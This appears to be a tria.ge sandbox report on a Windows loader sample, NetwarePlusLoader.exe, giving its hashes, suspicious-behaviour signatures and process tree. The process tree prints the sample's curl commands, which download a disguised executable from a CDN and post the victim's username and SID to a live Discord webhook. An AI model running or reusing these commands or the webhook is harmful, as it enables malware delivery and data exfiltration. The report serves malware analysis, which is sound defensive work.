Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
14/07/2024, 10:51
Static task
static1
Behavioral task
behavioral1
Sample
NetwarePlusLoader.exe
Resource
win7-20240705-en
General
-
Target
NetwarePlusLoader.exe
-
Size
190KB
-
MD5
3aee5f71b6ba6b81fa54ff3d5bfd30e0
-
SHA1
5e0c48c23895cf097fcce62cc9d73db55d6fb605
-
SHA256
05df9a3930acdd99f5d5f5420e33a3f0cb35c50da8d2b7f36b52c6f56230e307
-
SHA512
a6c97e8905002ae7e4dba759f2b871fff87a9d730576963914e3336ebc4c402c711e03c5bc086f1e2027fc9bf9fe9913cf30935e4048579f223296041ab340af
-
SSDEEP
3072:lv69ZK/pWcANFVJ9pVe7DRIClM8H3c8yR7k6tX00bgUql:lv69ZK/pWcANFVJ9pVe7DRXlds8g7Ptz
Malware Config
Signatures
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2356 NetwarePlusLoader.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2356 wrote to memory of 3056 2356 NetwarePlusLoader.exe 33 PID 2356 wrote to memory of 3056 2356 NetwarePlusLoader.exe 33 PID 2356 wrote to memory of 3056 2356 NetwarePlusLoader.exe 33 PID 2356 wrote to memory of 3056 2356 NetwarePlusLoader.exe 33 PID 2356 wrote to memory of 2704 2356 NetwarePlusLoader.exe 35 PID 2356 wrote to memory of 2704 2356 NetwarePlusLoader.exe 35 PID 2356 wrote to memory of 2704 2356 NetwarePlusLoader.exe 35 PID 2356 wrote to memory of 2704 2356 NetwarePlusLoader.exe 35
Processes
-
C:\Users\Admin\AppData\Local\Temp\NetwarePlusLoader.exe"C:\Users\Admin\AppData\Local\Temp\NetwarePlusLoader.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2356 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/Dropper.mp4?v=1720953874596 --output %temp%\childlover.exe2⤵PID:3056
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c curl "https://discord.com/api/webhooks/1253698648257331411/L0Gb25A61e5G82Iq8Fne61WHla2fpQ9qB4rmcg6N7SlZixH4Kdr3tU27ilVxLwzmFpZT" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""@everyone\nSomeone Injected!\nAdmin | S-1-5-21-1385883288-3042840365-2734249351-1000"",""embeds"":null,""avatar_url"":""https://cdn.discordapp.com/avatars/1191678925055737867/9af2e220817c7d8265ce700fba05e989.webp?size=1024&format=webp&width=0&height=256"",""attachments"":[]}"2⤵PID:2704
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5B
MD5495063beeac89309a2247ce9c13ed292
SHA1063ee00ca80d81e068dd404b59ceb2a03b2e7109
SHA256b4116d6e880009dc1440ddab7ec054bcea529aea394ec5bab7943b415a359281
SHA512cac6de984822cd7cf97611897611873cb5951b9a63f75a46a54aa6c0d2f3565419a1aa574c657df94a7057d85b99515753615b7336d96a7ff9463a0f3dbf3ffa